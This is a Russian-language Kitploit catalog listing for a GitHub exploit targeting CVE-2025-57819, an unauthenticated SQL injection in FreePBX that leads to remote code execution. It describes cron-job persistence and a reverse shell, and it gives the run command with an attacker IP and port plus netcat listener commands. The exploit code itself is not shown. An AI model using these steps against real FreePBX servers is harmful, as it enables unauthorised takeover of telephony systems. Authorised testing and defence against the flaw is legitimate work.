Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2025-57819-exploit | Kitploit
Инструменты/GitHubGitHub/its1zero/cve-2025-57819-exploit
Механизмы персистентностиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubits1zero/cve-2025-57819-exploit

cve-2025-57819-exploit

Репозиторий
1 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-57819 Эксплойт

Метаданные

  • Критичность: Критический (9.8)
  • Вектор: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • Тип: Неаутентифицированная SQL-инъекция → Удалённое выполнение кода
  • Затронутое ПО: FreePBX (модуль endpoint) < 15.0.66, < 16.0.89 и < 17.0.3
  • Протестировано на: FreePBX 16.0.40.7 на CentOS 7 с Apache 2.4

Обзор

Этот скрипт эксплуатирует CVE-2025-57819 в уязвимом модуле endpoint FreePBX. Уязвимость позволяет выполнять SQL-инъекцию, которая используется для внедрения вредоносных заданий cron.

В отличие от других публичных эксплойтов, здесь не требуются дополнительные шаги, такие как взаимодействие с целью через загруженный веб-шелл. Это прямолинейный подход, который сразу предоставляет вам прямой доступ к reverse shell.

Воздействие

Удалённое выполнение кода достигается через SQL-инъекцию и манипуляцию заданиями cron. Успешная эксплуатация приводит к получению reverse shell на целевой системе. В зависимости от конфигурации это может привести к полной компрометации системы.

Возможности

  • SQL-инъекция через уязвимый эндпоинт AJAX
  • Автоматическая генерация полезной нагрузки reverse shell
  • Постоянство через задание cron, выполняемое каждую минуту (* * * * *)
  • Автоматическая очистка внедрённого задания cron
  • Использует полезные нагрузки в hex-кодировке, поскольку полезные нагрузки в base64 повреждаются, когда символы + интерпретируются как пробелы.

Использование

Запустите эксплойт, указав цель и конфигурацию слушателя:

root@kitploit:~
python3 cve-2025-57819.py <target> <lhost> <lport>

Параметры

  • <target>: Целевое имя хоста или IP-адрес (уязвимый экземпляр FreePBX)
  • <lhost>: IP-адрес атакующего для обратного вызова reverse shell
  • <lport>: Порт прослушивания для входящего соединения

Пример:

root@kitploit:~
python3 cve-2025-57819.py freepbx.local 10.10.16.38 9999

Настройка слушателя

Запустите слушатель перед выполнением эксплойта:

root@kitploit:~
nc -lvnp <port>

Пример:

root@kitploit:~
nc -nlvp 9999

Отказ от ответственности

Этот инструмент предназначен только для образовательных целей и авторизованного тестирования безопасности. Несанкционированное использование против систем без явного разрешения незаконно. Автор не несёт ответственности за неправомерное использование или ущерб, причинённый этим инструментом.

Автор

Its1Zero - [email protected]

Ссылки

  • https://nvd.nist.gov/vuln/detail/cve-2025-57819
  • https://github.com/freepbx/security-reporting/security/advisories/ghsa-m42g-xg4c-5f3h
  • https://github.com/watchtowrlabs/watchTowr-vs-FreePBX-CVE-2025-57819
Скачать инструмент